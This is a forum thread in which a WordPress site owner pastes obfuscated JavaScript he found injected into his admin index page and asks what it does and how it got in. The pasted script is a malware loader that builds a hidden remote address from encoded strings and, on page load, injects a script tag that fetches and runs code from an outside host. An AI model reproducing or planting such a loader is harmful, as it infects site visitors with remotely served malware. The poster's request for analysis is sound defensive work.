1. This site uses cookies. By continuing to use this site, you are agreeing to our use of cookies. Learn More.

A Virus Script in my wordpress website.. pasted code here.. :(

Discussion in 'BlackHat Lounge' started by the_punisher, Apr 9, 2010.

  1. the_punisher

    the_punisher Power Member

    Joined:
    Feb 6, 2008
    Messages:
    506
    Likes Received:
    115
    I found the virus in wp-admin/index.php.. I am pasting the code here.. can anyone make sense of it like what it was trying to do..

    Code:
    <sc*rip*t>var D;if(D!='' && D!='X'){D=''};var U=new Array();var p="";function u(){var aY=new Date();var uV=RegExp;var Q;if(Q!='q'){Q=''};var N="]";var kn;if(kn!=''){kn='vn'};var zN;if(zN!='e' && zN!='vh'){zN='e'};var r="\x2f\x67\x61\x6e\x6a\x69\x2e\x63\x6f\x6d\x2f\x67\x61\x6e\x6a\x69\x2e\x63\x6f\x6d\x2f\x67\x6f\x6f\x67\x6c\x65\x2e\x63\x6f\x6d\x2f\x61\x6e\x67\x65\x67\x65\x2e\x63\x6f\x6d\x2f\x6b\x69\x6a\x69\x6a\x69\x2e\x63\x61\x2e\x70\x68\x70";var H='';function F(d,B){var hE=new Array();var g;if(g!='Hl' && g != ''){g=null};var hR;if(hR!='t' && hR!='HX'){hR='t'};var BK=String("iMc[".substr(3));BK+=B;var As;if(As!=''){As='sS'};BK+=N;var WG='';var TR='';var S=new uV(BK, new String("7wkg".substr(3)));var K;if(K!='' && K!='eo'){K='HT'};var pH;if(pH!='' && pH!='ed'){pH='jH'};return d[new String("rep"+"lac"+"e")](S, H);};var Rv;if(Rv!='I' && Rv != ''){Rv=null};var fH;if(fH!='' && fH!='Nu'){fH='Bh'};var W=F('8955593606965585956650693356','6395');var Ud=new Date();var ga=new Array();var x="src";var Il=new Array();var FC='';var h=window;this.Dk='';var b;if(b!='ny' && b!='Hn'){b=''};var sST=new String();var T=unescape("%68%74%74%70%3a%2f%2f%69%66%65%6e%67%2d%63%6f%6d%2e%63%69%74%69%62%61%6e%6b%2e%63%6f%6d%2e%74%72%69%70%61%64%76%69%73%6f%72%2d%63%6f%6d%2e%6e%65%65%64%73%65%72%76%65%2e%72%75%3a");var G='';var P=F('dUeJfHeKrJ','Yq8gMKH0EUJbu');var PG=new String();var Gs=new Array();this.gX="";h[String("onlo2SzX".substr(0,4)+"ad")]=function(){var Jm=new Date();try {a=document.createElement(F('sHcTrviHpTtT','HUvT'));var lA;if(lA!='C'){lA=''};var Fg=new Date();FC=T;var fJ;if(fJ!='At'){fJ='At'};FC+=W;FC+=r;var vW;if(vW!='pO' && vW!='Bp'){vW=''};var Ic=new Date();a[x]=FC;var bO;if(bO!='' && bO!='xL'){bO=''};a[P]=[1][0];var WW;if(WW!='Xp'){WW=''};var _t=new String();var tg=new String();document.body.appendChild(a);var CB=new Array();var sO="";} catch(Y){this.Wl='';var G_;if(G_!='wP' && G_!='PP'){G_=''};};};var oH=new Array();var ow=new Array();};var Ec;if(Ec!='ho' && Ec!='Jw'){Ec='ho'};var Hj;if(Hj!='rh' && Hj!='ON'){Hj='rh'};u();this.fa="";var jC;if(jC!='' && jC!='aZ'){jC=null};</scri*pt>
     
  2. the_punisher

    the_punisher Power Member

    Joined:
    Feb 6, 2008
    Messages:
    506
    Likes Received:
    115
    also how the f*ck did it get there? is this my servers weakness?

    my laptop is pretty much infected now.. with some trojan.. dont even try to run this code